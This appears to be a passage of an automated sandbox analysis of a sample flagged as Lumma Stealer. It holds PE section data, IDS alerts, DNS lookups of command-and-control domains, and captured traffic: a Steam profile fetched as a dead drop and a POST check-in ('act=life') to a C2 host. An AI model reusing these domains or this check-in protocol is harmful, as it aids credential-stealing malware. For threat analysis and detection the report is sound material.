                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      pop es
                                                                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x52000 | 0x26400 | 7d462f32bd4ee1913de4c3c8af227ef0 | False | 0.9995532066993464 | data | 7.972809484614253 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x53000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wxmqvxzx | 0x55000 | 0x2a7000 | 0x2a6e00 | ef5f1a5af1927091da284401a8e2dd15 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
igxirnni | 0x2fc000 | 0x1000 | 0x400 | 084d4955afa1b265c13a2971c9c86167 | False | 0.7431640625 | data | 5.8449707799936235 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x2fd000 | 0x3000 | 0x2200 | be16a3e400a23eac85880ccf0efde232 | False | 0.06502757352941177 | DOS executable (COM) | 0.7526901123271367 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-28T09:40:36.603434+0100 | 2058582 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) | 1 | 192.168.2.6 | 51430 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:36.754966+0100 | 2058584 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) | 1 | 192.168.2.6 | 54712 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:36.898768+0100 | 2058586 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) | 1 | 192.168.2.6 | 54194 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:37.042295+0100 | 2058588 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) | 1 | 192.168.2.6 | 52736 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:37.187079+0100 | 2058580 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) | 1 | 192.168.2.6 | 54388 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:37.334435+0100 | 2058590 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) | 1 | 192.168.2.6 | 65021 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:37.482669+0100 | 2058572 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) | 1 | 192.168.2.6 | 62373 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:37.628228+0100 | 2058576 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) | 1 | 192.168.2.6 | 59338 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:37.770258+0100 | 2058578 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) | 1 | 192.168.2.6 | 55955 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:39.542504+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49708 | 23.55.153.106 | 443 | TCP
2024-12-28T09:40:40.342216+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.6 | 49708 | 23.55.153.106 | 443 | TCP
2024-12-28T09:40:41.997663+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49711 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:42.754289+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49711 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:42.754289+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49711 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:44.043402+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49712 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:44.806133+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49712 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:44.806133+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49712 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:46.404954+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49718 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:48.769334+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49724 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:51.149799+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49734 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:53.751677+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49745 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:54.892469+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49745 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:56.618003+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49752 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:56.694770+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.6 | 49752 | 172.67.157.254 | 443 | TCP
2024-12-28T09:41:00.510681+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49764 | 172.67.157.254 | 443 | TCP
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.529175997 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.559463978 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.559511900 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.559568882 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.559576035 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.559622049 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.575890064 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.575911045 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.575922966 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.575930119 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.727094889 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.727171898 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.727251053 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.727607012 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.727622986 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:41.997545004 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:41.997663021 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.010251045 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.010288954 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.011450052 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.012541056 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.012577057 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.012717009 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.754362106 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.754663944 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.754734039 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.754870892 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.754894972 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.754914045 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.754921913 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.783554077 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.783622980 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.783705950 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.784193993 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.784209013 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.043248892 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.043401957 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.044941902 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.044951916 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.045191050 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.046459913 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.046459913 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.046539068 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.806196928 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.806351900 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.806443930 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.806464911 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.806539059 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.806588888 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.806596994 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.808948040 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.809000969 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.809007883 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.817385912 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.817464113 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.817485094 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.825834990 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.825908899 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.825923920 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.869735003 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.925493956 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.979116917 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.979152918 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.007117987 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.007271051 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.007308006 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.010582924 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.010657072 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.010694027 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.010870934 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.010934114 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.014118910 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.014157057 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.014173031 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.014182091 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.145944118 CET49718443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.146061897 CET44349718172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.146173954 CET49718443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.146480083 CET49718443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.146528959 CET44349718172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:46.404871941 CET44349718172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:46.404953957 CET49718443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:46.406445980 CET49718443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.230458975 CET49764443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.230524063 CET44349764172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.230600119 CET49764443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.231127977 CET49764443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.231139898 CET44349764172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.510680914 CET49764443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:36.603434086 CET5143053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:36.744663954 CET53514301.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:36.754966021 CET5471253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:36.894984961 CET53547121.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:36.898767948 CET5419453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.038850069 CET53541941.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.042294979 CET5273653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.182410955 CET53527361.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.187078953 CET5438853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.330739021 CET53543881.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.334434986 CET6502153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.474453926 CET53650211.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.482669115 CET6237353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.624663115 CET53623731.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.628227949 CET5933853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.767657995 CET53593381.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.770257950 CET5595553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.913577080 CET53559551.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.917455912 CET5496653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:38.058557987 CET53549661.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.582607985 CET6540153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.726042986 CET53654011.1.1.1192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 28, 2024 09:40:36.603434086 CET | 192.168.2.6 | 1.1.1.1 | 0xf333 | Standard query (0) | mindhandru.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:36.754966021 CET | 192.168.2.6 | 1.1.1.1 | 0x2ef5 | Standard query (0) | prisonyfork.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:36.898767948 CET | 192.168.2.6 | 1.1.1.1 | 0x4d74 | Standard query (0) | rebuildeso.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:37.042294979 CET | 192.168.2.6 | 1.1.1.1 | 0x120d | Standard query (0) | scentniej.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:37.187078953 CET | 192.168.2.6 | 1.1.1.1 | 0xe07 | Standard query (0) | inherineau.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:37.334434986 CET | 192.168.2.6 | 1.1.1.1 | 0x6cf2 | Standard query (0) | screwamusresz.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:37.482669115 CET | 192.168.2.6 | 1.1.1.1 | 0x3b5c | Standard query (0) | appliacnesot.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:37.628227949 CET | 192.168.2.6 | 1.1.1.1 | 0xb32f | Standard query (0) | cashfuzysao.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:37.770257950 CET | 192.168.2.6 | 1.1.1.1 | 0xa050 | Standard query (0) | hummskitnj.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:37.917455912 CET | 192.168.2.6 | 1.1.1.1 | 0x63ac | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:40.582607985 CET | 192.168.2.6 | 1.1.1.1 | 0x65a4 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 28, 2024 09:40:36.744663954 CET | 1.1.1.1 | 192.168.2.6 | 0xf333 | Name error (3) | mindhandru.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:36.894984961 CET | 1.1.1.1 | 192.168.2.6 | 0x2ef5 | Name error (3) | prisonyfork.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:37.038850069 CET | 1.1.1.1 | 192.168.2.6 | 0x4d74 | Name error (3) | rebuildeso.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:37.182410955 CET | 1.1.1.1 | 192.168.2.6 | 0x120d | Name error (3) | scentniej.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:37.330739021 CET | 1.1.1.1 | 192.168.2.6 | 0xe07 | Name error (3) | inherineau.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:37.474453926 CET | 1.1.1.1 | 192.168.2.6 | 0x6cf2 | Name error (3) | screwamusresz.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:37.624663115 CET | 1.1.1.1 | 192.168.2.6 | 0x3b5c | Name error (3) | appliacnesot.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:37.767657995 CET | 1.1.1.1 | 192.168.2.6 | 0xb32f | Name error (3) | cashfuzysao.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:37.913577080 CET | 1.1.1.1 | 192.168.2.6 | 0xa050 | Name error (3) | hummskitnj.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:38.058557987 CET | 1.1.1.1 | 192.168.2.6 | 0x63ac | No error (0) | steamcommunity.com | | 23.55.153.106 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:40.726042986 CET | 1.1.1.1 | 192.168.2.6 | 0x65a4 | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:40:40.726042986 CET | 1.1.1.1 | 192.168.2.6 | 0x65a4 | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• lev-tolstoi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49708 | 23.55.153.106 | 443 | 6032 | C:\Users\user\Desktop\k7T6akLcAr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:40:39 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
2024-12-28 08:40:40 UTC | 1905 | IN | HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Sat, 28 Dec 2024 08:40:40 GMT
    Content-Length: 35121
    Connection: close
    Set-Cookie: sessionid=7fd2a94ddba340e7c47d3e1d; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-28 08:40:40 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-28 08:40:40 UTC | 10097 | IN | Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-28 08:40:40 UTC | 10545 | IN | Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.6 | 49711       | 172.67.157.254 | 443              | 6032 | C:\Users\user\Desktop\k7T6akLcAr.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:40:42 UTC | 262 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
2024-12-28 08:40:42 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-12-28 08:40:42 UTC | 1121 | IN | HTTP/1.1 200 OK
    Date: Sat, 28 Dec 2024 08:40:42 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
